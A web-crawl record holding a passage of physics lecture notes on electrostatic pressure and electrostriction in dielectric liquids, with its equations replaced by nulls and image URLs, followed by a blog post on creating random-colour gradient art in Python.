"is the pressure within the liquid when in equilibrium with the electrostatic force density",
null,
"then force balance requires that",
null,
"(599)\n\nIt follows from Equation (585) that",
null,
"(600)\n\nWe can integrate this equation to give",
null,
"(601)\n\nwhere 1 and 2 refer to two general points in the liquid. Here, it is assumed that the liquid possesses an equation of state, so that",
null,
". If the liquid is essentially incompressible (i.e.,",
null,
"constant) then",
null,
"(602)\n\nFinally, if the liquid obeys the Clausius-Mossotti relation then",
null,
"(603)\n\nAccording to Equations (554) and (604), if a sphere of dielectric liquid is placed in a uniform electric field",
null,
"then the pressure inside the liquid takes the constant value",
null,
"(604)\n\nIt is clear that the electrostatic forces acting on the dielectric are all concentrated at the edge of the sphere, and are directed radially inwards: that is, the dielectric is compressed by the external electric field. This is a somewhat surprising result because the electrostatic forces acting on a rigid conducting sphere are concentrated at the edge of the sphere, but are directed radially outwards. We might expect these two cases to give the same result in the limit",
null,
". The reason that this does not occur is because a dielectric liquid is slightly compressible, and is, therefore, subject to an electrostriction force. There is no electrostriction force for the case of a completely rigid body. In fact, the force density inside a rigid dielectric (for which",
null,
") is given by Equation (585), with the third term (the electrostriction term) missing. It is easily demonstrated that the force exerted by an electric field on a rigid dielectric is directed outwards, and approaches that exerted on a rigid conductor in the limit",
null,
".\n\nAs is well known, if a pair of charged (parallel plane) capacitor plates are dipped into a dielectric liquid then the liquid is drawn up between the plates to some extent. Let us examine this effect. We can, without loss of generality, assume that the transition from dielectric to vacuum takes place in a continuous manner. Consider the electrostatic pressure difference between a point",
null,
"lying just above the surface of the liquid in between the plates, and a point",
null,
"lying just above the surface of the liquid well away from the capacitor (where",
null,
"). The pressure difference is given by",
null,
"(605)\n\nNote, however, that the Clausius-Mossotti relation yields",
null,
"at both",
null,
"and",
null,
", because",
null,
"in a vacuum [see Equation (599)]. Thus, it is clear from Equation (585) that the electrostriction term makes no contribution to the line integral (606). It follows that",
null,
"(606)\n\nThe only contribution to this integral comes from the vacuum/dielectric interface in the vicinity of point",
null,
"(because",
null,
"is constant inside the liquid, and",
null,
"in the vicinity of point",
null,
"). Suppose that the electric field at point",
null,
"has normal and tangential (to the surface) components",
null,
"and",
null,
", respectively. Making use of the boundary conditions that",
null,
"and",
null,
"are constant across a vacuum/dielectric interface, we obtain",
null,
"(607)\n\ngiving",
null,
"(608)\n\nThis electrostatic pressure difference can be equated to the hydrostatic pressure difference",
null,
"to determine the height,",
null,
", that the liquid rises between the plates. At first sight, the above analysis appears to suggest that the dielectric liquid is drawn upward by a surface force acting on the vacuum/dielectric interface in the region between the plates. In fact, this is far from being the case. A brief examination of Equation (604) shows that this surface force is actually directed downwards. According to Equation (585), the force which causes the liquid to rise between the plates is a volume force that develops in the region of non-uniform electric field at the base of the capacitor, where the field splays out between the plates. Thus, although we can determine the height to which the fluid rises between the plates without reference to the electrostriction force, it is, somewhat paradoxically, this force that is actually responsible for supporting the liquid against gravity.\n\nLet us consider another paradox concerning the electrostatic forces exerted in a dielectric medium. Suppose that we have two charges embedded in a uniform dielectric of dielectric constant",
null,
". The electric field generated by each charge is the same as that in a vacuum, except that it is reduced by a factor",
null,
". We, therefore, expect the force exerted by one charge on the other to be the same as that in a vacuum, except that it is also reduced by a factor",
null,
". Let us examine how this reduction in force comes about. Consider a simple example. Suppose that we take a parallel plate capacitor, and insert a block of solid dielectric between the plates. Suppose, further, that there is a small vacuum gap between the faces of the block and each of the capacitor plates. Let",
null,
"be the surface charge densities on each of the capacitor plates, and let",
null,
"be the bound charge densities that develop on the outer faces of the intervening dielectric block. The two layers of bound charge produce equal and opposite electric fields on each plate, and their effects therefore cancel each other. Thus, from the point of view of electrical interaction alone there would appear to be no change in the force exerted by one capacitor plate on the other when a dielectric slab is placed between them (assuming that",
null,
"remains constant during this process). That is, the force per unit area (which is attractive) remains",
null,
"(609)\n\nHowever, in experiments in which a capacitor is submerged in a dielectric liquid the force per unit area exerted by one plate on another is observed to decrease to",
null,
"(610)\n\nThis apparent paradox can be explained by taking into account the difference in liquid pressure in the field-filled space between the plates, and the field-free region outside the capacitor. This pressure difference is balanced by internal elastic forces in the case of the solid dielectric discussed earlier, but is transmitted to the plates in the case of the liquid. We can compute the pressure difference between a point",
null,
"on the inside surface of one of the capacitor plates, and a point",
null,
"on the outside surface of the same plate using Equation (607). If we neglect end effects then the electric field is normal to the plates in the region between the plates, and is zero everywhere else. Thus, the only contribution to the line integral (607) comes from the plate/dielectric interface in the vicinity of point",
null,
". Using Equation (609), we find that",
null,
"(611)\n\nwhere",
null,
"is the normal field-strength between the plates in the absence of dielectric. The sum of this pressure force and the purely electrical force (610) yields a net attractive force per unit area",
null,
"(612)\n\nacting between the plates. Thus, any decrease in the forces exerted by charges on one another when they are immersed or embedded in a dielectric medium can only be understood in terms of mechanical forces transmitted between these charges by the medium itself.",
null,
"",
null,
"",
null,
"Next: Exercises Up: Electrostatics in Dielectric Media Previous: Clausius-Mossotti Relation\nRichard Fitzpatrick 2014-06-27"
] | [
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/next.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/up.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/prev.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img891.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1207.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1253.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1254.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1255.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1256.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1257.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1258.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1259.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1236.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1260.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1261.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1262.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1263.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1264.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1265.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1266.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1267.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1268.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1264.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1269.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1270.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1271.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1270.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1272.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1273.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1274.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1275.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1276.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1277.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img474.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1278.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1279.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1280.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1281.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1282.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/next.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/up.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/prev.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90223163,"math_prob":0.98643494,"size":7196,"snap":"2020-10-2020-16","text_gpt3_token_len":1626,"char_repetition_ratio":0.17074527,"word_repetition_ratio":0.05956376,"special_character_ratio":0.20956087,"punctuation_ratio":0.082170546,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99511707,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112],"im_url_duplicate_count":[null,null,null,null,null,null,null,1,null,4,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,4,null,1,null,1,null,1,null,1,null,null,null,null,null,2,null,1,null,1,null,null,null,null,null,1,null,1,null,null,null,null,null,2,null,null,null,null,null,1,null,2,null,1,null,2,null,1,null,1,null,1,null,10,null,null,null,null,null,null,null,1,null,1,null,null,null,1,null,1,null,null,null,null,null,null,null,1,null,5,null,1,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-09T11:23:18Z\",\"WARC-Record-ID\":\"<urn:uuid:f4aa7b74-c963-4170-84ba-28cdab489a8b>\",\"Content-Length\":\"22289\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:85aada8a-fed7-4cf5-af47-c983c4eecc9d>\",\"WARC-Concurrent-To\":\"<urn:uuid:dfb66991-c28c-4f05-924d-71a04880e63e>\",\"WARC-IP-Address\":\"146.6.100.132\",\"WARC-Target-URI\":\"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/node46.html\",\"WARC-Payload-Digest\":\"sha1:ZQF2T3KWW555C6PWTRQ2UCHO5LGWM2LC\",\"WARC-Block-Digest\":\"sha1:UNWOLEQNARC2TIVSF3EMCANXPDVYB6AE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371833063.93_warc_CC-MAIN-20200409091317-20200409121817-00486.warc.gz\"}"} |
https://kripto.famnit.upr.si/tag/walsh-transform/ | [
"# Walsh transform\n\n## Proving the conjecture of O’Donnell in certain cases and disproving its general validity\n\nFor a function $f:\\\\{−1,1\\\\}^n\\\\to \\\\{−1,1\\\\}$ the relationship between the sum of its linear Fourier coefficients $\\\\hat{f}(i)$ (defined by $\\\\hat{f}(i)≔\\\\frac{1}{2^n}\\\\sum_{x\\in \\\\{−1,1\\\\}^n} f(x)x_i$ for $i=1,2,\\\\ldots,n$ and …"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.66373664,"math_prob":0.99993837,"size":485,"snap":"2022-40-2023-06","text_gpt3_token_len":167,"char_repetition_ratio":0.0977131,"word_repetition_ratio":0.0,"special_character_ratio":0.29896906,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99949104,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-02T07:36:48Z\",\"WARC-Record-ID\":\"<urn:uuid:c1bbcb8a-2db3-417e-b59a-f23dde1798c6>\",\"Content-Length\":\"10748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2d63382d-ae68-4d2b-91ce-7d80ff848583>\",\"WARC-Concurrent-To\":\"<urn:uuid:b18e30d9-b16d-4689-a5cd-111f79b4df32>\",\"WARC-IP-Address\":\"35.231.210.182\",\"WARC-Target-URI\":\"https://kripto.famnit.upr.si/tag/walsh-transform/\",\"WARC-Payload-Digest\":\"sha1:YQZ3VKXOOPD7OGV3G2WO6R6J63TUUGBZ\",\"WARC-Block-Digest\":\"sha1:C7W76ITDQSYBXD2MDNF6Q6ERMWZIF6IQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337287.87_warc_CC-MAIN-20221002052710-20221002082710-00734.warc.gz\"}"} |
http://mizar.uwb.edu.pl/version/current/html/proofs/stirl2_1/55_1 | [
"A2: for k being object st k in F2() holds\nex x being object st\n( x in F1() & P1[k,x] )\nproof\nlet k be object ; :: thesis: ( k in F2() implies ex x being object st\n( x in F1() & P1[k,x] ) )\n\nassume A3: k in F2() ; :: thesis: ex x being object st\n( x in F1() & P1[k,x] )\n\nF2() is Subset of NAT by Th8;\nthen reconsider k9 = k as Element of NAT by A3;\nex x being Element of F1() st P1[k9,x] by A1, A3;\nhence ex x being object st\n( x in F1() & P1[k,x] ) ; :: thesis: verum\nend;\nconsider f being Function of F2(),F1() such that\nA4: for x being object st x in F2() holds\nP1[x,f . x] from dom f = F2() by FUNCT_2:def 1;\nthen reconsider p = f as XFinSequence of F1() by AFINSQ_1:5;\ntake p ; :: thesis: ( dom p = Segm F2() & ( for k being Nat st k in Segm F2() holds\nP1[k,p . k] ) )\n\nthus ( dom p = Segm F2() & ( for k being Nat st k in Segm F2() holds\nP1[k,p . k] ) ) by ; :: thesis: verum"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.78967845,"math_prob":0.9991241,"size":507,"snap":"2019-43-2019-47","text_gpt3_token_len":205,"char_repetition_ratio":0.15904573,"word_repetition_ratio":0.33043477,"special_character_ratio":0.42998028,"punctuation_ratio":0.15151516,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987303,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-14T06:20:14Z\",\"WARC-Record-ID\":\"<urn:uuid:146bdedd-a96e-4017-89ef-2bdbb868c148>\",\"Content-Length\":\"9575\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45e381fb-3620-4373-8e8e-357a9f0627ea>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a3d5d23-c96f-4801-8eb8-eb5f5340053b>\",\"WARC-IP-Address\":\"212.33.73.131\",\"WARC-Target-URI\":\"http://mizar.uwb.edu.pl/version/current/html/proofs/stirl2_1/55_1\",\"WARC-Payload-Digest\":\"sha1:CD24DNO2IOZB6MOEKOZYWP7LFZCNNJDQ\",\"WARC-Block-Digest\":\"sha1:IOVEGTEJMAZNEGB2PTFCTD5F5NRO5KZY\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668004.65_warc_CC-MAIN-20191114053752-20191114081752-00025.warc.gz\"}"} |
https://semmtech.com/mathematicsandlinkeddata/ | [
"## Researching the Value of Mathematics-Enhanced Linked Data",
null,
"Mathematical operations are critical to managing data in Architecture, Engineering, and Construction (AEC). This is evident in the engineering standards that ensure the engineering practices, designs, and products are consistent and of high quality. These standards combine (1) textual descriptions and (2) mathematical information such as formulas and conditions. As organizations in the AEC sector strive for greater efficiency and collaboration, they increasingly use semantic information technologies, including Linked Data. These allow users to share and access data in a structured and machine-readable format.\n\nCurrently, semantic information works well for textual descriptions and is already used in standards such as IMBOR. However, expressing and using mathematics in Linked Data is less developed. Our innovation department is at the forefront of this field, i.e., Mathematics enhanced Linked Data, working on solutions that meet the needs of our clients. In this article, we delve into the research our intern Ani Mkheidze conducted in the field of Linked Data and mathematical operations. This research aimed to create a machine-readable format that reduces ambiguity in specifications (engineering standards), uses Linked Data to calculate and validate mathematical expressions, and makes it easier to share and understand mathematical information.\n\nA mathematical expression, which we often encounter in engineering standards, is made of elements arranged in a specific way according to rules. The most common elements are numbers, variables, and operations. The research focuses on decomposing these expressions, which means breaking down complex equations into smaller and simpler parts. It involves separating the variables and clearly defining the operators and symbols used. For example, in the simple equation a + b, the variables (a & b) are separated, and the operator is +. The meaning of the operator (In this case, the +-sign) is established by linking them to a concrete definition that machines can understand, which is called an ontology. This way, new operations can always be added.\n\nAs part of our research, we created two models to solve the challenge of making it easier to share and understand mathematical information for software. The first model uses existing technology (SPARQL) to turn a mathematical equation into a format that computers and humans can read. The second model decomposes the equation and embeds it in Linked Data. Both models do not require the user to write complicated expressions; an intuitive format exists for both. It is sufficient to provide the input data and the expressions, and the computer does the rest.\n\nThis research can potentially revolutionize how mathematical data is managed in the AEC sector, improving efficiency and collaboration between organizations. Both models have successfully achieved the goal of calculating and validating expressions, enabling clients to integrate mathematics into software and standardize the process. The second model aimed to decompose expressions, reducing ambiguity and facilitating swift and clear sharing of mathematical information. If you want to learn more about our research, including detailed evaluations and case studies, contact Sander Stolk, Sebastiaan Hoeboer, or Ani Mkheidze."
] | [
null,
"https://semmtech.com/wp-content/uploads/2022/10/AdobeStock_61724955.jpeg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9158715,"math_prob":0.8775193,"size":3497,"snap":"2023-40-2023-50","text_gpt3_token_len":632,"char_repetition_ratio":0.12940165,"word_repetition_ratio":0.01171875,"special_character_ratio":0.17243351,"punctuation_ratio":0.110154904,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9541877,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-02T14:12:05Z\",\"WARC-Record-ID\":\"<urn:uuid:adf4a82b-a0b6-47d2-a6de-47ff837cf2b1>\",\"Content-Length\":\"73130\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c074fd06-e0bb-4da2-a0f5-b3f50a292cb7>\",\"WARC-Concurrent-To\":\"<urn:uuid:076e1f52-3a1f-4e52-abaf-6d9f5705e914>\",\"WARC-IP-Address\":\"151.101.194.159\",\"WARC-Target-URI\":\"https://semmtech.com/mathematicsandlinkeddata/\",\"WARC-Payload-Digest\":\"sha1:TM7FRAUQJCKF3IHP2UUHO46PDRIQ2KEE\",\"WARC-Block-Digest\":\"sha1:EKLFQSP3CKQ7TQ2ZLAQXLZJIXIXUO75N\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100427.59_warc_CC-MAIN-20231202140407-20231202170407-00547.warc.gz\"}"} |
https://codereview.stackexchange.com/questions/141084/church-numerals | [
"# Church Numerals\n\nHere is exercise 2.6 from SICP:\n\nExercise 2.6: In case representing pairs as procedures wasn’t mind-boggling enough, consider that, in a language that can manipulate procedures, we can get by without numbers (at least insofar as nonnegative integers are concerned) by implementing 0 and the operation of adding 1 as\n\n(define zero (lambda (f) (lambda (x) x)))\n\n(lambda (f) (lambda (x) (f ((n f) x)))))\n\n\nThis representation is known as Church numerals, after its inventor, Alonzo Church, the logician who invented the λ-calculus.\n\nDefine one and two directly (not in terms of zero and add-1). (Hint: Use substitution to evaluate (add-1 zero)). Give a direct definition of the addition procedure + (not in terms of repeated application of add-1).\n\n (define one (lambda (f) (lambda (x) (f x))))\n\n(define two (lambda (f) (lambda (x) (f (f x)))))\n\n;; I used an identity function to check the + procedure\n(define (+ a b)\n(lambda (f)\n(lambda (x)\n((((a f) b) f) x))))\n\n\nHow can I improve this code?\n\nYour function + is not correct.\n\nThe definition of the sum of two Church numerals is the following:\n\n(define (plus a b)\n(lambda (f)\n(lambda (x)\n((a f) ((b f) x)))))\n\n\n(see for instance wikipedia).\n\nIn fact, the Church numeral n can be defined as the functional that applies a given functionf n times to a given value x. So in the above definition, the sum (plus a b) first apply b times f to x, and to that result f is applied a times. In your definition, instead, the types of the applications inside the body of the function are wrong.\n\nHow to test for the correctness of Church numerals and functions over them?\n\nYou simply apply a Church numeral to the function integer successor (i.e. (lambda(x)(+ x 1))) and the number 0 to find if it produces the corresponding “regular” numeral. So, for instance:\n\n(define (succ x) (+ x 1)) ;; here + is the integer addition, not your function!\n\n((zero succ) 0) ; produces 0\n((one succ) 0) ; produces 1 etc.\n\n\nSo you can test if the sum is correct with:\n\n(((plus one two) succ) 0) ; produces 3\n\n\nIf you try your function, you will find:\n\n(((+ one two) succ) 0) ; raises an error"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8542732,"math_prob":0.993511,"size":1019,"snap":"2019-43-2019-47","text_gpt3_token_len":273,"char_repetition_ratio":0.15665025,"word_repetition_ratio":0.01775148,"special_character_ratio":0.28949952,"punctuation_ratio":0.0964467,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9988914,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-12T12:33:25Z\",\"WARC-Record-ID\":\"<urn:uuid:27b34ee5-c4e2-4930-a288-cdd457570226>\",\"Content-Length\":\"134053\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:27106fe3-89ed-4b9e-8712-9ca820c22ecf>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ea9e257-1211-4c80-8325-357f3a2f5442>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://codereview.stackexchange.com/questions/141084/church-numerals\",\"WARC-Payload-Digest\":\"sha1:S3RPTI75M3XSWZ2EOR77DFTLE3QRTR3J\",\"WARC-Block-Digest\":\"sha1:4GSDERYLXCZTDJP3I4KXAXWNNPRQJ6NX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496665521.72_warc_CC-MAIN-20191112101343-20191112125343-00086.warc.gz\"}"} |
https://cre8math.com/category/geometry-2d/page/5/ | [
"## Evaporation II\n\nLast week, we began exploring the piece Evaporation. In particular, we looked at two aspects of the piece — randomness of both the colors and the sizes of the circles — and experimented with these features in Python. Look at last week’s post for details!",
null,
"Today, we’ll examine the third significant aspect of the piece — the color gradient. The piece is a pure sky blue at the top, but becomes more random toward the bottom. How do we accomplish this?\n\nEssentially, we need to find a way to introduce “0” randomness to each color at the top, and more randomness as we move toward the bottom. To understand the concept, though, we’ll be introducing 0 randomness at the bottom, and more as we move up. You’ll see why in a moment.\n\nLet’s first look at a linear gradient. Imagine that we’re working with a",
null,
"$1\\times1$ square — we can always scale later. Here’s what it looks like:",
null,
"The “linear” part means we’re looking at randomness as a function of",
null,
"$y^1=y.$ So when",
null,
"$y=0,$ we subtract",
null,
"$y=0$ randomness to each color. But when",
null,
"$y=1/2,$ we subtract a random number between",
null,
"$0$ and",
null,
"$y=1/2$ from each of the RGB values. Finally, at the very top, we’re subtracting a random number between",
null,
"$0$ and",
null,
"$1$ from each RGB value. Recall that if an RGB value would ever fall below",
null,
"$0$ as a result of subtraction, we’d simply treat the value as",
null,
"$0.$\n\nWhy do we subtract as we go up? Recall that black has RGB values",
null,
"$(0,0,0),$ so subtracting the randomly generated number pushes the sky blue toward black. If we added instead, this would push the sky blue toward white. In fact, you can push the sky blue toward any color you want, but that’s a little too involved for today’s post.\n\nThe piece Evaporation was actually produced with a quadratic gradient. Let’s look at a picture first:",
null,
"That the gradient is quadratic means that the randomness introduced is proportional to",
null,
"$y^2$ for each value of",
null,
"$y.$ In other words, at a level of",
null,
"$y=1/2$ on our square, we subtract a random number between",
null,
"$0$ and",
null,
"$(1/2)^2=1/4.$\n\nYou can visually see this as follows. Look at the gradient of color change from",
null,
"$0$ to",
null,
"$1/2$ for the quadratic gradient. This is approximately the same color change you see in the linear gradient between",
null,
"$0$ and",
null,
"$1/4.$ Why does this happen? Because when you square numbers less than",
null,
"$1,$ they get smaller. So smaller numbers will introduce less randomness in a quadratic gradient than they will in a linear gradient.\n\nWe can go the other way, we well. If we use a quadratic gradient (exponent of",
null,
"$2>1$), the color changes more gradually at the bottom. But if we use an exponent less than",
null,
"$1$ (such as in taking a root, like a square root or cube root), we get the opposite effect: color changes more rapidly at the bottom. This is because taking a root of a number less than",
null,
"$1$ increases the number. It’s easiest to see this with an example:",
null,
"In this case, the exponent used is",
null,
"$0.4,$ so that for a particular",
null,
"$y$ value, a random number between",
null,
"$0$ and",
null,
"$y^{0.4}$ is subtracted from each RGB value. Note how quickly the color changes from the sky blue at the bottom toward very dark colors at the top.\n\nOf course this is just one way to vary colors. But I find it a very interesting application of power and root functions usually learned in precalculus — using computer graphics, we can directly translate an algebraic, functional relationship geometrically into a visual gradient of color. Another example of why it is a good idea to enlarge your mathematical toolbox — you just never know when something will come in handy! If I didn’t really understand how power and root functions worked, I wouldn’t have been able to create this visual effect so easily.\n\nNow it’s your turn! You can visit the Evaporation worksheet to try creating images on your own. If you’ve been trying out the Python worksheets all along, the code should start to look familiar. But a few comments are in order.\n\nFirst, we just looked at a",
null,
"$1\\times 1$ square. It’s actually easier to think in terms of integer variables “width” and “height” (after all, there is no reason our image needs to be square). In this case, we use “j” as the height parameter, since it is more usual to use variables like “i” and “j” for integers. So “j/height” would correspond to",
null,
"$y.$ This would produce a color gradient of light to dark form bottom to top.\n\nTo make the gradient go from top to bottom, we use “(height-j)/height” instead (see the Python code). This makes values near the top of the image correspond to",
null,
"$0,$ and values near the bottom of the image correspond to",
null,
"$1.$ I’ll leave it to you to explore all the other details of the Python code.\n\nPlease feel free to comment with images you create using the Sage worksheet!\n\nAs mentioned in the previous post as well, each parameter you change — each number which appears anywhere in your code — affects the final image. Some choices seem to give more appealing results than others. This is where are meets technology.\n\nAs a final word — the work on creating fractals is still ongoing. I’ve learned to make movies now using Processing:\n\nYou’ll notice how three copies of one fractal image morph into one of another. You can find more examples on Twitter: @cre8math. Once I feel I’ve had enough experience using Processing, I’ll post about how you can use it yourself. The great thing about Processing is that you can use Python, so all your hard work learning Python will yield even further dividends!\n\n## Evaporation I\n\nThis and the next post will walk you through how to create digital art similar to Evaporation. I’ll also show you some Python code you can use yourself to experiment.",
null,
"There are three significant features of Evaporation. First is the randomness of the colors. Second — if you look closely — the sizes of the circles are also different; these are randomly generated as well. The third feature is the gradient of the color — from a pure sky blue at the top, to a fairly randomly colored row of circles at the bottom. We’ll look at the first two features today.",
null,
"Let’s look at color. In the figure above, the small teal square at the left has RGB values of 0, 0.5, and 0.7, respectively. The larger square at the left consists of 100 smaller squares. The color of each of these squares is generated by adding a random number between 0 and 0.1 to each of the RGB values 0, 0.5, and 0.7 — with a different random number added to each value. In the middle square, a random number between 0 and 0.2 is added, so this creates a wider range of color values. For the right square, the random numbers added are between 0 and 0.3.\n\nBut there is no reason that the ranges need to the same for each color. In the images below, the red values have a wider range of randomness then the green, which is “more random” than the blue.",
null,
"You can see that different ranges of random numbers create different color “textures.” This is where I think computer meets art — as a programmer, when it comes to creating random numbers, you have to specify a range for the randomness of each variable. The choices you make determine how your image looks. How do you make “artistic” choices? There is no easy answer, of course.\n\nAnother way to use randomness is by varying the size of the graphic objects. In the left square below, texture is created by randomly changing the radii of the circles.",
null,
"In the middle square, the circles are all the same size, but random shades of gray. The right square varies both the size of the circles and their color. The final result depends on “how much” randomness is used. You can try it for yourself by altering the Python code linked to below — change the randomness and see what happens!\n\nI think of my laptop as an art laboratory. It is a place to experiment with different ideas — change this parameter, increase randomness, try out different color combinations. Can you imagine creating any of the images in this post by hand? The computer allows us to perform experiments unthinkable to Rembrandt and Van Gogh. We may lose the texture of brush strokes or the dimensionality of paint on canvas, but what we gain by having a programming language at our disposal makes up for this loss. At least in my opinion….\n\nNow let’s look at how we can use Python to create these images. You can experiment with this color and texture worksheet.\n\nThere is not much more to say here since a lot is explained in the worksheet. But as you are creating, keep a few things in mind.\n\n1. Use descriptive variable names. This helps a lot when you’re looking a lines of code. Using variables a, b, c, etc., doesn’t help much when you’re looking at a program you wrote a few months ago.\n\n2. Comment liberally! Notes to yourself are easy to use in Python — just start a line (or part of a line) with the “\\#” character. You’ll thank yourself 